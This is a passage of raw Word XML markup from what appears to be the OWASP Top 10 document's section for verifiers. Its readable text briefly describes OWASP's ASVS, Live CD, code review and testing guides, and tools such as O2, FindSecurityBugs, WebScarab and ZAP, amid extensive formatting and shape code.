      <w:hyperlink r:id="rId72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(ASVS)</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId726" w:history="1">
        <w:r w:rsidR="00810992">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="000000"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.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This document defines a minimum verification standard for performing web application security assessments. OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD80B0E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recommends that you use the ASVS as guidance for not only what to look for when verifying the security of a web application,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472CF453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but also which techniques are most appropriate to use, and to help you define and select a level of rigor when verifying the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A5DEA2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ecurity of a web application. OWASP also recommends you use the ASVS to help define and select any web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AB57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ssessment services you might procure from a third party provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F023B8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119717F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Assessment Tools Suite: The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="8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88"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP Live CD Project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> has pulled together some of the best open source security tools into a single</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80566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bootable environment or virtual machine (VM). Web developers, testers, and security professionals can boot from this Live CD,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12803D5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or run the VM, and immediately have access to a full security testing suite. No installation or configuration is required to use the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBDC67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ools provided on this CD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77737BE0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24642681" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3125EC85" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EF7300" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="383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Code Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B81D1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="385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ecure code review is particularly suited to verifying that an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69501F5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pplication contains strong security mechanisms as well as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE51F3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finding issues that are hard to identify by examining the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232AA3D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pplication’s output. Testing is particularly suited to proving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DCD47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at flaws are actually exploitable. That said, the approaches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF8CC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re complementary and in fact overlap in some areas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C58AD4B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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Reviewing the Code: As a companion to the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727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OWASP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70FD11F3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:hyperlink r:id="rId728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Developer’s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29" w:history="1">
        <w:r w:rsidR="00810992"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Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId730" w:history="1">
        <w:r w:rsidR="00810992"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,</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> and the </w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP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A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Testing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10992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, OWASP has</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A69349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produced the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWAS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Cod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Review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Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> to help developers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6D22AD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nd application security specialists understand how to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D8017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efficiently and effectively review a web application for security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC2789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by reviewing the code. There are numerous web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45AAA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security issues, such as Injection Flaws, that are far easier to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB0BA7D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find through code review, than external testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EEFD85" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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Code Review Tools: OWASP has been doing some promising</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53807BF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work in the area of assisting experts in performing code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0320390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nalysis, but these tools are still in their early stages. The</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06387EEA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uthors of these tools use them every day when performing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4069816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ir secure code reviews, but non-experts may find these</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A96CF5D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ools a bit difficult to use. These include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CodeCrawler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>,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731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Orizon</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId732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,</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="769DE3B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and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O2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. Only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O2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> has been under active development since the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223702BC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last release of the Top 10 in 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3370B2F3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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re are other free, open source, code review tools. The</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058DE72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most promising is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FindBugs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, and its new security focused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE97299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lastRenderedPageBreak/>
        <w:t>plugin called: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FindSecurityBugs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, both of which are for Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE3099" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB2F54" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5389DF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="383" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>Security and Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DD207A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="401" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Testing the Application: OWASP produced the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId733" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="95"/>
            <w:sz w:val="19"/>
          </w:rPr>
          <w:t>Testing Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F33DAE2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o help developers, testers, and application security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336105E4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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>specialists understand how to efficiently and effectively test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2BC3FC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2"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>the security of web applications. This enormous guide, which</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A7151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had dozens of contributors, provides wide coverage on many</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A9F0F0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web application security testing topics. Just as code review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078D1017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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>has its strengths, so does security testing. It’s very compelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF0138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when you can prove that an application is insecure by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CEAA64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demonstrating the exploit. There are also many security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686BB17E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241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issues, particularly all the security provided by the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06850F96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pplication infrastructure, that simply cannot be seen by a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B394AE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code review, since the application is not providing all of the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BB0FA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ecurity itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA13187" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF5BF30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pplication Penetration Testing Tools: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WebScarab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, which</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB488A7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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>was one of the most widely used of all OWASP projects,  and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB3E05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the new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93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3"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ZAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, which now is far more popular, are both web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B70701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3"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>application testing proxies. Such tools allow security analysts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10948C41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and developers to intercept web application requests, so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD559C1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they can figure out how the application works, and then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE1072B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ubmit test requests to see if the application responds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDCF675" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241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securely to such requests. These tools are particularly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7A778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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>effective at assisting in identifying XSS flaws, Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14106C94" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240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flaws, and Access Control flaws.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ZAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> even has an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hyperlink r:id="rId734" w:history="1">
        <w:r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active</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55223644" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId735" w:history="1">
        <w:r w:rsidR="00810992">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
          </w:rPr>
          <w:t>scanner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> built in, and best of all it’s FREE!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C88BA01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5665" w:space="0"/>
            <w:col w:w="5135" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44547009" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="19"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="765AE188" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="455"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="34B176F6">
          <v:shape id="imagerId736" o:spid="_x0000_s2147" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:123pt;height:96pt;z-index:-251697664;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId736" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="172D85D9">
          <v:shape id="imagerId737" o:spid="_x0000_s2146" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:10pt;margin-top:233pt;width:84pt;height:487pt;z-index:-251696640;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId737" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="48749E70">
          <v:shapetype id="_x0000_m2145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CEF08E7">
          <v:shape id="_x0000_s2144" type="#_x0000_m2145" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-251718144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39355412">
          <v:shapetype id="_x0000_m2143" coordsize="54000,3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DE6FB53">
          <v:shape id="_x0000_s2142" type="#_x0000_m2143" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:90pt;width:540pt;height:30pt;z-index:-251717120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31446F40">
          <v:shapetype id="_x0000_m2141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96CCAC2">
          <v:shape id="_x0000_s2140" type="#_x0000_m2141" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:119.5pt;width:541pt;height:1pt;z-index:25171302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4DAB4C84">
          <v:shapetype id="_x0000_m2139" coordsize="100,63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FA34E34">
          <v:shape id="_x0000_s2138" type="#_x0000_m2139" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89pt;width:1pt;height:631pt;z-index:25171404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76FBEA18">
          <v:shapetype id="_x0000_m2137" coordsize="100,63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9508651">
          <v:shape id="_x0000_s2136" type="#_x0000_m2137" style="position:absolute;left:0;text-align:left;margin-left:539.5pt;margin-top:89pt;width:1pt;height:631pt;z-index:25171507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13DA4F8">
          <v:shapetype id="_x0000_m2135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4EEAC3E">
          <v:shape id="_x0000_s2134" type="#_x0000_m2135" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89.5pt;width:541pt;height:1pt;z-index:25171609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3527A73">
          <v:shapetype id="_x0000_m2133" coordsize="43776,7378" o:spt="100" adj="0,,0" path="m43776,1229l43776,1229,43776,6148c43776,6148,43771,6249,43759,6347,43740,6443,43713,6537,43679,6627,43638,6713,43591,6796,43538,6874,43480,6948,43416,7018,43346,7082,43272,7141,43194,7194,43111,7241,43025,7281,42935,7315,42842,7342,42746,7362,42647,7374,42547,7378l42547,7378,,7378,,7378,,,,,42547,0c42547,,42647,4,42746,16,42842,36,42935,63,43025,97,43111,137,43194,184,43272,237,43346,296,43416,360,43480,429,43538,503,43591,582,43638,664,43679,751,43713,840,43740,934,43759,1030,43771,1128,43776,1229e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2E3062E6">
          <v:shape id="_x0000_s2132" type="#_x0000_m2133" style="position:absolute;left:0;text-align:left;margin-left:85.7pt;margin-top:244.85pt;width:437.75pt;height:73.75pt;z-index:-251716096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114ED239">
          <v:shapetype id="_x0000_m2131" coordsize="43876,7478" o:spt="100" adj="0,,0" path="m43826,1279l43826,1279,43826,6198c43826,6198,43821,6299,43809,6397,43790,6493,43763,6587,43729,6677,43688,6763,43641,6846,43588,6924,43530,6998,43466,7068,43396,7132,43322,7191,43244,7244,43161,7291,43075,7331,42985,7365,42892,7392,42796,7412,42697,7424,42597,7428l42597,7428,50,7428,50,7428,50,50,50,50,42597,50c42597,50,42697,54,42796,66,42892,86,42985,113,43075,147,43161,187,43244,234,43322,287,43396,346,43466,410,43530,479,43588,553,43641,632,43688,714,43729,801,43763,890,43790,984,43809,1080,43821,1178,43826,1279e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="17E37ED2">
          <v:shape id="_x0000_s2130" type="#_x0000_m2131" style="position:absolute;left:0;text-align:left;margin-left:85.2pt;margin-top:244.35pt;width:438.75pt;height:74.75pt;z-index:-251715072;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#d4dcd3" strokeweight="1pt">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0D84F4EA">
          <v:shapetype id="_x0000_m2129" coordsize="1165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0B47872">
          <v:shape id="_x0000_s2128" type="#_x0000_m2129" style="position:absolute;left:0;text-align:left;margin-left:148.5pt;margin-top:261.8pt;width:116.5pt;height:.6pt;z-index:-25171404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67D732C">
          <v:shapetype id="_x0000_m2127" coordsize="2659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5B83CF1">
          <v:shape id="_x0000_s2126" type="#_x0000_m2127" style="position:absolute;left:0;text-align:left;margin-left:141.15pt;margin-top:274.65pt;width:265.9pt;height:.6pt;z-index:-25171302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3806E136">
          <v:shapetype id="_x0000_m2125" coordsize="16632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AFAB19A">
          <v:shape id="_x0000_s2124" type="#_x0000_m2125" style="position:absolute;left:0;text-align:left;margin-left:281.35pt;margin-top:298.4pt;width:166.3pt;height:.6pt;z-index:-251712000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E7C4ABE">
          <v:shapetype id="_x0000_m2123" coordsize="43776,7379" o:spt="100" adj="0,,0" path="m43776,1230l43776,1230,43776,6149c43776,6149,43772,6250,43760,6348,43740,6444,43713,6538,43679,6628,43638,6714,43592,6797,43539,6875,43480,6949,43416,7019,43347,7083,43273,7142,43194,7195,43112,7242,43025,7282,42935,7316,42842,7343,42746,7363,42647,7375,42547,7379l42547,7379,,7379,,7379,,,,,42547,0c42547,,42647,4,42746,16,42842,36,42935,63,43025,97,43112,137,43194,184,43273,237,43347,296,43416,360,43480,430,43539,504,43592,582,43638,665,43679,751,43713,841,43740,935,43760,1031,43772,1129,43776,1230e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="014C4726">
          <v:shape id="_x0000_s2122" type="#_x0000_m2123" style="position:absolute;left:0;text-align:left;margin-left:88.05pt;margin-top:341.7pt;width:437.75pt;height:73.75pt;z-index:-251710976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66523479">
          <v:shapetype id="polygon76" o:spid="_x0000_m2121" coordsize="43876,7479" o:spt="100" adj="0,,0" path="m43826,1280l43826,1280,43826,6199c43826,6199,43822,6300,43810,6398,43790,6494,43763,6588,43729,6678,43688,6764,43642,6847,43589,6925,43530,6999,43466,7069,43397,7133,43323,7192,43244,7245,43162,7292,43075,7332,42985,7366,42892,7393,42796,7413,42697,7425,42597,7429l42597,7429,50,7429,50,7429,50,50,50,50,42597,50c42597,50,42697,54,42796,66,42892,86,42985,113,43075,147,43162,187,43244,234,43323,287,43397,346,43466,410,43530,480,43589,554,43642,632,43688,715,43729,801,43763,891,43790,985,43810,1081,43822,1179,43826,1280e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7AB40495">
          <v:shape id="WS_polygon76" o:spid="_x0000_s2120" type="#polygon76" style="position:absolute;left:0;text-align:left;margin-left:87.55pt;margin-top:341.2pt;width:438.75pt;height:74.75pt;z-index:-251709952;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#d4dcd3" strokeweight="1pt">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6720D2BF">
          <v:shapetype id="polygon83" o:spid="_x0000_m2119" coordsize="1426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141C4B9">
          <v:shape id="WS_polygon83" o:spid="_x0000_s2118" type="#polygon83" style="position:absolute;left:0;text-align:left;margin-left:151.3pt;margin-top:357.75pt;width:142.65pt;height:.6pt;z-index:-25170892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324D729">
          <v:shapetype id="_x0000_m2117" coordsize="1065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75EED60">
          <v:shape id="_x0000_s2116" type="#_x0000_m2117" style="position:absolute;left:0;text-align:left;margin-left:145.55pt;margin-top:396.25pt;width:106.55pt;height:.6pt;z-index:-25170790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4FC55F88">
          <v:shapetype id="_x0000_m2115" coordsize="43776,7378" o:spt="100" adj="0,,0" path="m43776,1230l43776,1230,43776,6149c43776,6149,43772,6250,43760,6348,43740,6444,43713,6538,43679,6627,43638,6714,43592,6796,43539,6875,43480,6949,43416,7018,43347,7082,43273,7141,43194,7194,43112,7241,43025,7281,42935,7315,42842,7342,42746,7362,42647,7374,42547,7378l42547,7378,,7378,,7378,,,,,42547,0c42547,,42647,4,42746,16,42842,36,42935,63,43025,97,43112,137,43194,184,43273,237,43347,296,43416,360,43480,430,43539,504,43592,582,43638,665,43679,751,43713,841,43740,935,43760,1031,43772,1129,43776,1230e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
